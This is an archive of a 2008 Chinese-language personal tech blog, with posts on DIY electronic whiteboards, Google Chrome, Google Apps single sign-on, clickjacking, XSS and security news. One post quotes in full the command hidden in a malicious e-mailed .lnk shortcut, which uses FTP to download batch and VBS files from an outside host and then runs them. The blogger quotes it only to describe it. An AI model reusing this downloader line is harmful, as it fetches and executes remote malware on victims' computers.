2008年12月20日 星期六

自製電子白板的資料

電子白板一面大約台幣 6 萬~1x 萬元,在國外有人利用 wii 的手把(稱為 wiimote,又稱 wii 右手控制器)作為感應器,捕捉紅外線光點,透過藍芽傳輸至電腦,做成與電子白板相同的效果。與電子白板相比,只需一支 wii 手把(pxhome 價格 1050 元),與一支自製紅外線筆(成本不到 100 元),算是非常經濟實惠。

之前才看到國外的資料,想不到國內也有熱心的老師研究這一塊,並且完成豐富的中文文件與經驗整理。甚至連完成度相當高的紅外線筆都可以在台灣拍賣網路上買到了。以下整理一些網路上的參考資料連結供有興趣的朋友參考。(就算用不著電子白板,也可以把自己的一般螢幕變成觸控手寫螢幕喔!雖然會有一些OOXX的狀況出現)

[[MORE]]

2008年12月17日 星期三

益智物理小遊戲 Crayon Physics

本文來自物理學科中心電子報12月號。遊戲請按此下載 (請點選 Download Now),解壓縮直接點選 crayon.exe 這個檔案即可執行。

Crayon Physics遊戲畫面

目標是讓紅色的小球去碰到閃動的星星,可是過程中需要的方塊、橋樑、階梯都要自己用滑鼠左鍵畫出來,滑鼠右鍵可以消除自己畫出來的物件。所有的東西都要符合物理的重力原理。

按﹝Space﹞會重置該關卡,按﹝Esc﹞會跳出可以選關的選單,﹝Alt﹞+﹝Enter﹞切換到全螢幕,﹝Alt﹞+﹝F4﹞則可以立刻關掉遊戲。

2008年12月12日 星期五

病毒:我設計的你看看

今天收到一個用 E-mail 寄來的病毒,標題如上。(那是信件標題,病毒不是我設計的!)

裡面附了一個檔案,是 .lnk 的捷徑檔,原本以為是打開後會連到惡意網站,結果仔細一看內容如下。
捷徑後面故意附了一長串空白,讓使用者用「內容」去看的時候,會看到空無一物。
可是我連上去,惡意程式無法下載,可能是伺服器負荷過大?
這種方式我倒是第一次看到,(可能是我孤陋寡聞),算是蠻有創意的一個病毒,是不是該稱讚一下?

"%windir%\system32\cmd.exe /c echo open lin31003100.3322.org > t.t&echo 123>>t.t&echo 123>>t.t&echo get down2.bat c:\down2.bat >> t.t&echo get vnet2.vbs %windir%\vnet2.vbs >> t.t&echo bye >> t.t&ftp -s:t.t&del t.t&start %windir%\vnet2.vbs&                    "

2008年10月11日 星期六

新的攻擊手法 Clickjacking

Clickjacking 是一個新的惡意攻擊手法,而且目前各廠牌瀏覽器都還沒有修補的方案。
參考以下資料:

[[MORE]]
簡單的說,大家都知道不明網站上的連結不要亂點,尤其出現問你「是否同意」、「確認、取消」的對話框時要特別注意。但這個漏洞則是利用 CSS 的排版技巧,用圖層去遮蓋連結。你可能只是在網頁上玩 Game,並在遊戲畫面上點來點去,結果你不知不覺點了「我同意」或是「確認」的按鈕。透過這個手法,駭客可以在你電腦中安裝軟體(因為你同意了嘛),也可以看到你的webcam視訊畫面(因為你也同意了啊),也可以傳回你的私人資料(對,你還是同意了)當然還有很多很多可能。

如果想節省時間的朋友,可以直接看這段影片瞭解該手法實際應用時的樣子:Youtube

膽子大一點的可以實際體驗一下遭受攻擊的感覺:Camera ClickJacking - The Game

我剛剛試了一下 Firefox + NoScript 擴充套件,預設是不會被攻擊的。再進一步解決方法出現之前,建議大家可以先安裝 NoScript 套件,雖然上網會不方便些,但是相對的安全許多。

還有不要上不明的網站,也要小心常上的網站突然改變排版或突然問你很多問題。

2008年10月9日 星期四

馬賽克的危險

有時候為了「有圖有真相」,有的人會把一些私人資料放到部落格,例如身份證、帳單等等,但又為了安全起見,放上去的圖片會用馬賽克把敏感的部分抹除。(例如消去身份證字號幾個號碼)

但小心了,馬賽克所抹除的文數字是有可能被還原回來的!

因為馬賽克雖然把文字內容變成圖塊,但不同的文字可能會變成不同顏色的圖塊,使用程式反覆比對,是可能還原出原始文數字的。那...有沒有解決的方法呢? 就是不要使用馬賽克,改用全黑、全白的單色方塊直接劃掉那些資訊,就像報紙上新聞照片處理被害者的眼睛那樣。

請看以下的原理與實作範例:

2008年9月10日 星期三

在 FreeBSD 安裝小紅傘防毒

請參考此文章:


如果安裝過程出現 /usr/libexec/ld-elf.so.1: Shared object "libc.so.5" not found, required by.... 的錯誤,而您也有照步驟中做了 soft link,卻還是會出現這個問題的話,可以安裝 /usr/ports/misc/compat5x/ 試試。

2008年9月4日 星期四

Google Chrome 的復活節彩蛋

有人說 Chrome 中文名稱應該譯為「啾咪」,以更貼近宅男的心。

這是題外話,有人在 Google Chrome 裡面發現了一些有趣的東西,你可以在網址列輸入:about:internets

不只這個,這裡還有目前最新的完整列表:

* about:memory
* about:stats
* about:network
* about:internets
* about:histograms
* about:dns
* about:cache
* about:plugins
* about:version

[[MORE]]
過不久說不定還會出現別的東西。

如果懶得裝或不想裝 Chrome 的朋友,可以直接看原文的抓圖:

Picasa 將提供人臉辨識功能

Google 知名的圖片管理軟體 Picasa 新版將提供人臉辨識功能。

也就是說,到時候你可以不用費心的把照片分類成:爸爸、媽媽、女朋友之類的,Picasa 會自動辨識照片中的人物,然後給你建議的標籤。(當然你之前需要先進行部分分類,以提供 picasa 學習的範本,照片越多想必辨識會越精確。)

不過文中也提到,有很多因素會影響辨識的正確性,如果被拍照的人能夠看著鏡頭,辨識效果會最好。

來源:Picasa Refresh Brings Facial Recognition

2008年9月3日 星期三

Captcha is broken - now what?

Captcha 就是現在很流行的「圖形驗證碼」,在某些網站為了避免機器人 SPAM 或暴力攻擊,很常使用這樣的手段,來確保取用服務的是人類還不是一段程式碼。

但很不幸,有政策就有對策,如果出現的圖形很固定,其實非常容易破解。個人的網誌就算了,像 Gmail 這種大公司的大服務,一旦無法抵擋機器人的攻擊就會影響很大。

大家可以看一下這一篇文章:Captcha is broken - now what?

Captcha 已經沒有用了,那接下來呢?

來看看變態的 Captcha 設計吧,請看一下這一些:
癮科技-沒有最變態,只有更變態的驗證碼設計

Google Chrome 移除畫面

移除 Google Chrome 的時候會被問一句話:

[[MORE]]

Google Chrome 移除畫面

Google 瀏覽器使用心得

Google 瀏覽器 / Google Chrome

  • 使用上感覺超像 Firefox 3,壓根兒覺得他是 Firefox 3 換個布景主題而成。

  • 又很像 IE,一些 IE only 的網頁也能順利瀏覽,不像 Firefox 根本無法顯示。(ActiveX應該還是不行)

  • 開新分頁時會出現許多「常用網頁」的小方塊,根本就是 Opera 的「快速撥號」。

  • 能夠設定的選項超少,大概是說「Google 都幫你做好最佳化了,請您別忙了。」

  • 大部分的功能選項包括書籤、搜尋引擎等都直接取用自電腦原本裝的 Firefox 設定。

  • 瀏覽區超大,上面那些按鈕、網址列做了超級精簡的改變。Tab 移至最上方,感覺它一點點都不想浪費空間。

  • 「無痕式視窗」可以盡可能不留下隱私資料,包括 cookie、密碼等。

  • 「建立應用程式捷徑」挺有趣的,有點像把網站直接變成應用程式捷徑放在桌面上,例如桌面上有 Gmail 圖示,打開就可以用。而且瀏覽區域又更更更大。

  • 網址列的顏色很豐富

  • 然後我玩完就移除了。


[[MORE]]

根據「Google瀏覽器Chrome即將現身一文」,Chrome 有以下特點:

  • Chrome內含新一代的Javascript引擎: V8,這是為了讓網頁上的應用程式能夠執行得更快更好,而不只是瀏覽頁面而已

  • Chrome的每一個tab都是獨立的應用程式,也就是說一個tab當掉不會影響到其他tab

  • Chrome架構在Apple Webkit和Firefox之上,可跨Windows、Mac OS X、Linux三大平台



網路消息是說這是一套 open source software,rendering engine 是 Apple’s WebKit,配上自己寫的 V8 JavaScript engine。在 apache 的 log 上會顯示:「"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13"」

在這裡有一些有趣的畫面:Google 自己的瀏覽器:Chrome

2008年9月2日 星期二

Google Chrome, Google’s Browser Project

Google 瀏覽器?

http://www.google.com/chrome

網址還連不上,但是各種消息已經被傳來傳去了!

看看 ScreenShots 吧!

一切都是從這個漫畫開始的:Google Chrome

Links:

9/3更正:Google Chrome 網站已經可以連上、可以下載了。

20 tech habits to improve your life

這裡提供二十個好的習慣,讓你使用電腦的時候更有效率(或更安全)。

ComputerWorld: 20 tech habits to improve your life

A few new habits can make the difference between staying on task, finding what you need and getting things done -- or having a tech meltdown.

有一些建議的確是挺不錯的,也有提供不少有用的連結、網站、或工具。

5分鐘內寫一隻即時通訊機器人

http://www.imified.com 這個網站提供了即時通訊 (IM) 的 API,讓你可以很方便的使用簡單的網頁程序語言如 PHP, Perl, Python 等,去寫一個可以溝通的機器人。目前支援的 IM 客戶端有 Google Talk, Yahoo! Messenger, Windows Live, Jabber 等。

這裡提供了一個 PHP 的 Hello World 範例。

關於更多的使用細節與介紹可以看這裡:
How to Write Your Own IM Bot in Less Than 5 Minutes

延伸閱讀:重灌狂人-台灣版超強的MSN機器人「有問必達」,可查股票、星座、字典、RSS訂閱、Twitter、縮短網址…

2008年8月8日 星期五

假如單車鎖的弱點也像軟體漏洞一樣被公開...

用原子筆就可以輕易打開腳踏車的 U 型鎖,在這個資訊揭露出來的時候,造成不小的轟動。但不知道有沒有人知道,U型鎖被破解,也不過就是腳踏車不見。前一陣子被揭露的實體鎖弱點,簡直是可以讓任何人自由進出你家了!也許實體硬體設備公司不希望這樣的資訊被揭露出來,但我基本上同意這句話「大家都不知道就算了~~一但一個人知道秘密了,大家就都必須知道~~」。


這是 ZDNet 的一篇文章:

假如單車鎖的弱點也像軟體漏洞一樣被公開...

節錄:2004年,一段在網路流傳的影片,示範如何用一支標準的原子筆打開U形的Kryptonite單車鎖。該公司因而回收這些鎖免費替換,然後改變新產品的設計。問題似乎解決了,是嗎?

別那麼確定。僅管同樣的問題早在12年前就被一本英國的單車雜誌揭露,Kryptonite仍繼續生產同樣的鎖。憤怒的消費者在2005年集體控告該公司,最後達成和解,由Kryptonite免費替換新鎖,並賠償那些單車因而失竊的人。BT安全技術長Bruce Schneier表示:「如果不把問題公開,那些公司就不會處理,消費者也繼續購買劣質的東西。」

2008年7月29日 星期二

Yahoo!奇摩地圖

http://tw.maps.yahoo.com

相較起來,新推出的Yahoo!奇摩地圖,比起 Google Maps 更在地化,配合上 Yahoo! 奇摩 原有的「生活」、「商家」等資料,食衣住行等資訊都可以很方便在地圖上找到。

而且它內建路徑規劃,我試了一下,精確度還算蠻高的。使用界面上也相當清爽。

不過在自由度上(小工具、自建地圖等),或是「街角視圖」等神奇功能,還是 Google 略勝一籌啦~

2008年7月27日 星期日

使用MP3檔案植入木馬

現在開啟 MP3 檔也要多加注意囉~
(尤其愛用 foxy 抓歌的朋友...)

卡巴斯基實驗室日前發現感染MP3音訊檔案的新型蠕蟲程式,可在使用者電腦安裝木馬病毒後,供網路罪犯控制。

ZDNet: 首隻蠕蟲會竄改宿主檔案

2008年6月19日 星期四

CCTV經濟半小時揭密網路駭客

曾幾何時,以前躲躲藏藏的 cracker,現在也可以賺大錢了。(當然還是要繼續躲躲藏藏啦)

CCTV經濟半小時揭密網路駭客

防止 hk.www404.cn ARP 病毒擴散

以 Cisco Router 為例,指令如下:(將 router 上對某個 IP 轉向 NULL,感謝縣網鍾主任指導)


enable
configure terminal
ip route 222.216.28.0 255.255.255.0 Null0 254 permanent


以上 222.216.28.x 是 hk.www404.cn 的 IP,需隨時注意是不是有改變。

當然重點是找到真正中毒的區域電腦,並加以掃毒。如果區網中有 FreeBSD 主機,可以看一下 /var/log/messages
裡面會有 kernel 的 ARP 錯誤。例如像下面這樣:

Jun 19 11:49:43 flame kernel: arp: 172.16.0.254 moved from 00:0f:ea:47:07:ee to 00:30:80:04:3e:01 on bge0

延伸閱讀:
161816 ARP病毒解決(之一)161816 ARP病毒解決(之二)

2008年6月16日 星期一

雲林縣教育網公佈欄 RSS

雲林縣教育網公佈欄 http://mysql.ylc.edu.tw/ann/ 採用戴興能大大所撰寫的 ANN 公告系統,這個系統廣為各學校或公家機關使用。不過可惜的是,其網頁編碼使用 Big5,且沒有提供 RSS。

小弟曾經試過很多次自己撰寫程式抓取該網站資料,並轉碼成為 utf-8,然後輸出成 xml 格式的 RSS 資料。

但每次總是出現各種奇奇怪怪的問題只好作罷。(這些問題包括抓回來的網頁資料變得破碎,或是轉碼失敗等等。我也不知道原因何在,只好請教高人)

[[MORE]]

不過幸好幫助我們把網頁擷取出內容,並自動變成 RSS feed 的工具網站並不只一個。我最後用了 Feed43,因為它可以解決 big5 轉 utf-8 的問題。

Feed43 :看使用說明1使用說明2使用說明3

另外也推薦這個整理:CoolWJT的十二度空間 - 7個能幫任意網頁製作 RSS Feed 的工具

其實我比較喜歡 ponyfish

最後報告結論,ANN 公告系統的 RSS feed 仍然沒有正確產生,我想跟它一個特性有關:最新修改過的文章會一直跑到最前面。

偏偏教育局那邊好像大家都很愛改來改去,所以資料一直不能被正確的讀取。(我猜是這個原因啦)

2008年6月15日 星期日

Firefox 3 即將推出

火狐鬥陣拼紀錄,有你一份!

Firefox 3 在 6 月 17 日(本週二)即將推出,歡迎大家一起來創造最新的金氏世界紀錄!
紀錄名稱是:「單日最多人下載軟體」。關於活動細節請點選上方圖示進入活動頁面。

結果:單日下載共有 800 萬人次,比起 Firefox 2 推出時的 160 萬人次真是有非常大幅的長進啊! (6/19)

2008年6月12日 星期四

Cross-Site Scripting 防止

2007 年OWASP公佈十大Web AP 安全反映出目前的攻擊現況,Cross-Site Scripting成為十大攻擊之首,呈現出目前網路釣魚與詐欺攻擊濫用Cross-Site Scripting的情形。

[[MORE]]

因此互動性網頁的設計者不可不慎,重點是對於使用者所輸入的東西必須加以過濾,尤其是 HTML 標籤。

對於 Cross-Site Scripting (XSS) 有興趣的朋友可以參考以下文件:(對不起,這些資料來源來自某個論壇,但我忘記在哪裡了)

2008年6月11日 星期三

Google Apps Education Edition 之五其他篇

這是 Google Apps Education Edition 相關文章的最後一篇了,希望拋磚引玉,讓大家縮短摸索的時間。小弟對 SSO 的實作老實說還不完整,頂多只能是堪用。希望將來有高手可以幫忙設計更多工具,協助企業或學校管理 SSO。

這一系列文章的前情提要:


GAFYD 是很不錯的服務,要注意的是,你雖然可以透過它使用 Google 的各項服務,但它卻不是一個正式的 Google 帳號 (Google Account)。這意味著,你如果想要使用 GAFYD 帳號去存取其他的 Google 應用,比如 Reader、Notes或是 Groups,那你必須另外申請一個 Google Account。但好消息是,你可以直接拿 GAFYD 的 E-mail 帳號來申請成為 Google Account,注意這兩者密碼當然就可能不同。

[[MORE]]

這種狀況就像你拿自己的 E-mail 去註冊為 LiveID,透過 LiveID 去使用 MSN 通訊軟體,你的 LiveID 與信箱雖然長得一樣,但是密碼可以相同也可以不同。

請看這個比較:一個 GAFYD 帳號與一般 Google 帳號有何不同。或者你也可以加入這個討論


除此之外,GAFYD 相較於正式的 Gmail 帳號也有不同的限制。比如說,內建的交談功能 (Web-based Gtalk) 裡,我找不到「群組交談」(Group Chat) 的按鈕。雖然沒辦法進行群組交談,但是仍可能使用這個功能,若是你的交談對象是一般的 gmail 帳號,由他來邀請其他人進行群組交談,那仍是可以間接達成此效果。

如果用 ThunderBird 或 outlook 作為 mail client,而想用自己的 SMTP 寄送密件副本(BCC),你也可能會遭遇一點點狀況,請看這個討論群

Google Apps Education Edition 之四SSO工具篇

比起自己依照 Google 的文件,設計屬於自己的 SSO,還不如直接找現成的工具來用。

比如說下面這幾樣是可以用在 GAFYD 的現成軟體:

  • GHeimdall (程式語言Python)- (授權GNU General Public License 2)

  • Enterprise Sign On Engine (Java) - (Apache License 2.0)

  • simpleSAMLphp (PHP) - (GNU Lesser General Public License)



[[MORE]]

當然還有別的,例如 Lasso 同時支援 C、PHP、Java。之所以列出上面三種,其實是 Google 文件中提到的。

其中由於我對 php 比較熟,而且我對 simple 這個字眼有好感,所以我選了 simpleSAMLphp 作為我實作的工具。

下載點:simplesamlphp_1_0.zip

  1. 先進行安裝:Installing simpleSAMLphp

  2. 進一步設定:simpleSAMLphp as an IdP for Google Apps for Education



如果按照程序設置完畢,卻仍出現錯誤「This service cannot be accessed because your login credentials have expired」,極有可能是系統時間錯誤,請用 ntptime 對時即可。(2010/4/25新增)

如果你對於 simpleSAMLphp 有任何問題的話,可以加入他們的討論區: simpleSAMLphp 討論區


註:
如果你對安全性要求很高,尤其你是一個常旅行在外,需要使用 public wifi 或是 shared PC 的人,那麼你可以考慮用 Gheimdall 進行 two-factor authentication。請參考:How to add two-factor authentication to Google Apps for your Domain using open source software

Google Apps Education Edition 之三SSO驗證篇

Google Apps Education Edition 之一申請篇
Google Apps Education Edition 之二SSO原理篇

還是趕快把這個話題講完,不然都快忘光了。

這系列文章主要在探討 Google Apps for Your Domain (GAFYD) 中的 Single Sign-On (SSO) 。SSO 在 GFAYD 的教育版 (Education Edition) 與專業版 (Premier Edition) 中都有提供。不過我剛好只能使用教育版,因此標題才會是如此。

要驗證、實作 SSO,最簡單的方法,我想還是使用 Google 提供的 demo 工具:

[[MORE]]

  1. 先看看整個驗證的流程圖

  2. 再看看根據這個流程所設計出來的驗證程式 (Static Demo of SAML-based SSO for Google Apps) 其說明

  3. 上述驗證程式的展示 Static Demo

  4. 你可以從這裡把這個驗證程式抓回來裝



請記得先把你的 php 升級到 php5 最新版。
如果你想要跳過這個驗證的步驟,直接進入到實作,請看下一篇文章。

2008年6月9日 星期一

防毒軟體大投票

LifeHacker 選出了 5 個最棒的防毒軟體,到底你最喜歡哪一個呢?

Five Best Antivirus Applications

現在正在進行投票喔,你可以看到目前的票數比

但下面就有人說話了,這是一個不公平的投票,因為把要錢的軟體跟不要錢的軟體拿在一起比,大家當然選不要錢的啊!(看投票結果果然是這樣,但也許有的人更愛「不付錢就能用」的「付費軟體」?)

而且這次的投票只是問大家「心目中」最愛的防毒軟體,得到第一名的那個,從專業角度來看不見得是速度最快、更新最迅速、檔案體積最小、抓毒率最高、誤判率最低的。但大家還是參考看看囉~

另外一個值得注意的訊息是,有好幾個人認為 AVG7 比 AVG8 好用。

2008年6月3日 星期二

Flash爆零時差攻擊

因為很忙,現在才來提醒一下大家,更新一下你瀏覽器的 Flash Player 吧。

ZDNet:Flash爆零時差攻擊 專家建議先停用
Potential Flash Player issue - update

總之,最新版的 Flash Player 9.0.124.0,「應該」是安全的。

2008年5月23日 星期五

Ubuntu 視覺特效

我使用 Linux 作為我的桌面系統已經有好一段時間了。不過有大約 30% 時間必須切回 Windows XP 去處理一些事情,例如使用 Photoshop, Sony Vegas, 題庫系統, Microsoft Visual Studio, Dreamweaver, FinePrint, Picasa.... 等等。(對,PicasaGoogle earth 都有 Linux 版,但那是透過模擬運行,用過的人都知道很難用。)

不過我在重灌狂人那邊看到 Windows Vista 與 Ubuntu 視覺特效 PK 戰的影片,深覺感動。於是決定大改造我的 Linux 桌面。

[[MORE]]

首先我重灌到 Ubuntu 8.04。(因為我的電腦比較舊,是收集別人報廢不用的機器組合而成的。) 如果你的電腦比較新,也許可以試試看 Kbuntu (KDE 4 Remix),他是 Ubuntu 改用 KDE4 作為視窗介面的修改版。

接下來,要安裝顯示卡驅動程式。我裝了兩台電腦,一台是 ATI 顯示卡,使用受限驅動程式管理員 (它現在就只叫做 Hardware Drivers)就可以了,一台是 Nvidia 顯示卡,後來是手動安裝驅動程式才搞定
關於 Nvidia 顯示卡安裝,我主要是根據這一篇文件,照著做就完成了。

然後安裝 Lazybuntu (Ubuntu 懶人包),解決中文以及多媒體播放 codec 的問題。另外推薦可以參考阿呆的blog:Ubuntu使用手記

然後該更新的都更新完之後,安裝 Compiz Fusion

當然要記得安裝 Advanced Desktop Effects Settings (ccsm),才能對各種特效做進一步設定。

特效的設定可以參考這一篇:ubuntu 7.10 啟動Compiz Fusion 3D桌面

比較可惜的是這篇文章內的圖片都出不來,而且很多 compiz 特效的用詞都換了,所以我摸了很久才根據這一篇改出了我自己的特效畫面,可能跟原作者的不太一樣,但是相信雖不近亦不遠矣。

又由於其中一台電腦我啟動桌面特效後,視窗外框會消失,於是只好使用 emerald。但也因為這樣,視窗外框變更好看了。

總之,我現在有了一台非常破舊的電腦,跑著非常絢麗的桌面,路過的朋友都讚嘆,問我他們能不能裝這東西,因此達到了推廣 Linux 的目的。

2008年5月6日 星期二

Google Apps Education Edition 之二SSO原理篇

Single Sign-On (簡稱 SSO),中文名稱為「單一登入」。

可以讓 Google Apps for your Domain (簡稱 GAFYD)與企業、組織中現有的網路服務結合,只需要一組帳號密碼,就可以使用所有服務。

在 GAFYD 中,Google 的角色是 Sp (Service Provider 服務提供者),你自己的企業則是 IdP (Identity Provider 身份提供者)。

[[MORE]]

SSO 的意義在於只需要一個 IdP,可以搭配很多個 Sp。(一組帳號密碼可以使用很多個服務)

例如 Pixnet 本身是相簿的 SP,也是部落格的 SP,同時 Google 也提供信箱的服務,因此 Google 亦為 SP。但 Pixnet 又要負責整合這些服務,提供單一的帳號密碼,所以它同時也是 IdP。

如果你在 GAFYD 選擇使用 SSO,那麼 Google 就成為 SP,你就要自行負責帳號密碼的管理,因此你是 IdP。

在這種狀況下,Google 必須有帳號密碼資料,你自己伺服器中也需要有帳號密碼的資料。這兩邊的帳號是同步存在的,但密碼卻可以不相同。如果你沒有開啟 SSO,那就會用 Google 裡面的密碼進行身份驗證。如果你開啟了 SSO,就會用你自己伺服器中的密碼驗證。當然,為了避免困擾,將兩邊的密碼同步起來是一個好辦法。

SSO 進行身份驗證時,使用的是 SAML 的標準。通訊的過程主要是以 XML 及其變形作為資料傳遞的格式。其運作流程由瀏覽器分別與 SP 及 IdP 溝通,利用 XML 身份格式做為媒介,將這兩者搭起來。請參考此頁的圖示說明

有興趣實作 SSO 的朋友,亦可參考前輩的經驗,以免走冤枉路。

Google Apps Education Edition 之一申請篇



最近開始使用 Google Apps,算是落後很多人的腳步。請參考 Google Apps 的各種好康

因為我一直在思考「代管」跟「全權掌握」之間的分際該如何拿捏,如果 Google 倒了? 如果 Google 沒有倒,但是服務變差了?比如突然要開始收費? 比如因為頻寬不足,所以速度變很慢?(好像最近開始有一些人反映 gmail 變慢)

除了這些,公司、學校或組織內的隱私權又該如何?Google 是不是間接也掌握了所有的機密?

[[MORE]]

再來,Gmail 令人稱頌的廣告信過濾,對某些公司來說簡直是惡夢。因為良好的廣告信過濾意味著「看起來像廣告信的正常信件」都有可能被攔截甚至不通知你就刪除。而少收客戶一封信件,有可能損失鉅額的訂單或商機。

最後我決定把這樣的服務提供給校友使用,而學校內的行政人員則建議繼續使用校內提供的服務。而且我需要 Single Sign-On (單一登入)功能,讓帳號密碼可以自己管理,如果將來 Google 將服務收回,我也可以繼續用別的方式提供類似的服務。而且 Single Sign-On 也可以跟校內原有的服務進行整合,比如大家可以參考 Pixnet 的作法,它提供自有的相簿與部落格服務,同一帳號密碼登入之後也能享用 Google 提供的 Gmail 服務。

首先申請一個網址,當然也可以用原來上級單位配發的網址,可是我們中小學的網址實在落落長,主要是加上了「縣市」(例如 ylc 的緣故),要請校友們來使用,可說是吸引力薄弱。因此可以另外買一個比較短的網址,例如我申請了 shsh.tw。

再用這個網址申請 Google Apps,只是記得如果你的網址中有 edu 的,可以申請教育版,才會有 Single Sign-On 功能。如果一般的公司想要用 Single Sign-On,就必須付費購買專業版(每個帳戶要每年 $50 美金)。至於 Google Apps 的各版本功能比較,請參考這裡

關於申請與設定 Google Apps 的細節,大家可以參考:


一開始這樣申請完,只是標準版而已,但你會收到一封信件,要求驗證成為教育版。點下去「理論上應該很輕鬆」就會變成教育版了。但因為我的網址前面提過是「shsh.tw」,並未包含 edu 的網域,所以被拒絕升級了。

透過客服升級為教育版,可以參考: 阿欣部落-升級華龍Google Apps為教育版

由此可知,Google 是有客服的!不但有客服,而且反應也相當迅速,絕不是固定機器人回信。我在與客服信件往返中,雖然屢遭拒絕,但最後終於感動他了(其實是我證件齊全啦,還好當時是用學校名義購買 shsh.tw 這個網址的)。於是我也申請到了教育版。

...待續

2008年4月24日 星期四

Google groups 建立多個討論區

最近在玩 Google Groups,覺得它作為 一般小型的討論區相當不錯,會員機制與郵件列表(Mailing-List)功能都很令人激賞。

只是我發現到有某些討論區 (groups) 裡面還有討論區 (sub-groups),例如:
http://groups.google.com/group/google-zh-TW

這樣太棒了吧?對大多數架站者而言,難道從此可以擺脫架設、管理 phpbb 或類似論壇的惡夢?直接用 google groups 打造一個自己的線上論壇,要有什麼板就有什麼板?

結果花了一個多小時爬文,一直翻原文資料,最後才確認一件事情:只有 Google 官方才能建立多重討論區,其他人就只能一個討論區一個板。殘念。

不過這樣的功能已經有很多人去跟官方乞求了,說不定不久的將來就會推出。

參考:[1] [2]

2008年4月22日 星期二

Skype 推出無限(便宜)方案

有在用 Skype 撥國際電話的朋友有福了!

Skype 推出月費吃到飽的方案,只需要月繳 $9.95,可以撥打到全球 34 國家的市話(包含台灣),不管講多久都沒關係!甚至針對部分國家的手機也一樣適用(例如加拿大、中國大陸、香港等)。

國際新聞是這麼說的,但是我到中文網頁看到的優惠則更可怕,這個方案的名稱叫做「一國通」,只需要台幣九十九元就可以了!而且現在「特別優惠 - 購買 3 個月,只付 2 個月的費用。2008 年 6 月 1 日截止。」!

真是太太太划算了,還不只這樣,這個方案還包含:線上號碼(就是 SkyIn 啦,原價每月 5 歐元,約 241元台幣,但殘念的是,台灣至今尚未提供Skyin門號)及語音信箱(原價每三個月 4 歐元)喔!

網頁下方還有一行小字:每個月最多 10,000 分鐘通話時間的公平使用政策適用。

2008/04/24 更正:上面的方案其實有點混淆,一國通就只能打同一國內有優惠,自由時報的報導最為詳盡,請大家移駕查詢。

2008年4月19日 星期六

電腦達人之把妹密技 Gogrok

你的朋友向你求救,說她不會用電腦如何如何,你心裡知道那很簡單,但是用電話、用MSN 就是怎麼都講不清楚,還不如親自到現場示範的五分鐘。

後來也許你知道可以透過遠端桌面或是 WinVNC 來遙控對方的電腦,但如果叫一個電腦白癡先去把這些東西裝好,我看半個小時也就過去了。

現在有個好東西來了,叫做 Gogrok,可以用來進行電腦操作的互動,隨時提供控制權、收回控制權,或僅是監看功能,這下子就算對方人在國外,你也可以很快幫她把電腦搞定囉。

他的廣告影片功能介紹短片都可以看一下。

詳見:【Gogrok】遊戲破不了關時…這樣求救就對啦!

2008年4月18日 星期五

網頁歸檔、留存工具

如果在網上衝浪時,看到了好文章,你會怎麼做呢?

最傳統的方式就是把它加到「我的最愛」或是「書籤」之中。
但時間一久,連結往往會失效,書籤整理起來也是個大麻煩。

傳統上有時候也會使用「網頁另存新檔」,這樣就可以避免連結失效的問題,不過存下來的檔案凌亂,資料更難找到了。

我後來使用 Firefox + ScrapBook,ScrapBook 實在太好了,幾乎可以沒有任何限制的存下各式網頁資料,包括圖片、Flash檔等,甚至還可以往下抓數層連結的資料。如果說它有什麼缺點,大概就是沒有「網路化」吧,比如我在外使用他人電腦的時候,想把資料存下來當然就沒辦法用這東西了。

所幸 Google Notes 被稱為是網路版的 ScrapBook 出現了,可以隨時存下資料,當然還可以用搜尋、標籤等工具來管理這些資料。缺點則是長度有限制,圖片等媒體無法儲存。希望 Google 大神可以在往後的版本中改進。

除此之外,原來還有很多很多的工具可以做這一類的事情,佩服整理這張表的人:
網頁歸檔 工具一覽表

2008年4月8日 星期二

OpenSource 3D 印表機

顧名思義,這是一台可以「印出」立體物體的印表機。

請看 Open source 3D printer copies itself

裡面有提到一個應用,比如某甲設計了一個東西(比如說手機),可以當場傳給遠在千里之外的某乙,透過印表機印出來,當場就是一個立體的實體手機囉~(當然不能打出去啦,不過再過幾年,誰知道?)

這東西有一點像是塑膠射出成型的原理吧~

OpenSource PowerShell - Pash

Windows PowerShell 是微軟為 Windows 環境所開發的 shell 及腳本語言技術,這項全新的技術提供了豐富的控制與自動化的系統管理能力;而「腳本語言」(scripting languages)則是用來編寫程式的電腦語言。腳本語言通常都有簡單、易學、易用的特性,目的就是希望能讓寫程式的人(開發者)快速完成程式的編寫工作。

例如 Unix (Unix-like) 環境下常見的 *.sh 就是腳本語言的一種。

不過在 M$ Windows 下卻沒有這樣的資源,過去我們會使用 *.bat 的批次檔來做類似的事情,不過對於迴圈控制或是環境變數的取得相當困難或相當麻煩。PowerShell 就是因應而來的救星。

對於 PowerShell 更詳細的資訊、文件、用法等,推薦網站 [賴榮樞]的軟體資訊誌,其上有相當豐富的資源。

Pash 則是 Open Source 版的 PowerShell,可以支援各種平台,包括 Mac, Linux, Solaris, ...甚至 Windows (Windows Mobile 及 Windows CE)。大家可以看一下 Pash 網頁上的範例,PowerShell 在某種程度上,真的是蠻有創意的哩~

Pash = Posh (PowerShell) + bash(one of the Unix shells)

2008年3月29日 星期六

Office 2007 新手入門

今天收到微軟的廣告信。(看起來真的很像廣告信,使用大量的圖片,看都沒看就令人想按刪除鍵)
在刪掉之前,瀏覽一下,發現它所介紹的這東西真的不錯:

Office 2007 新手入門

用過 Office 2007 的人就知道,由於選單項目作了大變更,所以常常會找不到以前自己常用的功能。我甚至一度以為,Office 2007 的功能似乎比原來還要少(但執行效率卻更慢?)。如果您也這麼覺得,那應該來看看上面這個網頁。

其中 Word 互動式參照指南,可以讓您執行 Word 2003 的畫面,並幫您找出他在 Word 2007 中的位置。比如我原本找不到「巨集」的指令,原來他藏在那個地方。(誰想得到啊!?)

還有: Excel 互動式參照指南

另外,大家也可以看看 示範:使用 SmartArt 圖形為文字增添風采,這個新添的工具真是非常強大,尤其在簡報時真是快速方便的利器。

再例如 示範:在 Word 2007 中為文件加上美麗的外觀,幫 Word 文件美化更為方便了。

2008年3月22日 星期六

改變Visual Studio預設語言

如果想在 Visual Studio 中改變預設的程式語言,例如將 C++ 改成 C#

從這裡:
工具 / 匯入和匯出設定 / 重設所有設定

我花了好幾個小時找這個功能。 XD

2008年3月21日 星期五

FlashGet疑自動下載木馬程式

這實在是個令人感到驚悚的新聞,因為使用 FlashGet 的人真是太多了。

難道這又再一次證明了大陸來的軟體不要亂裝比較好?

ZDnet:FlashGet疑自動下載木馬程式


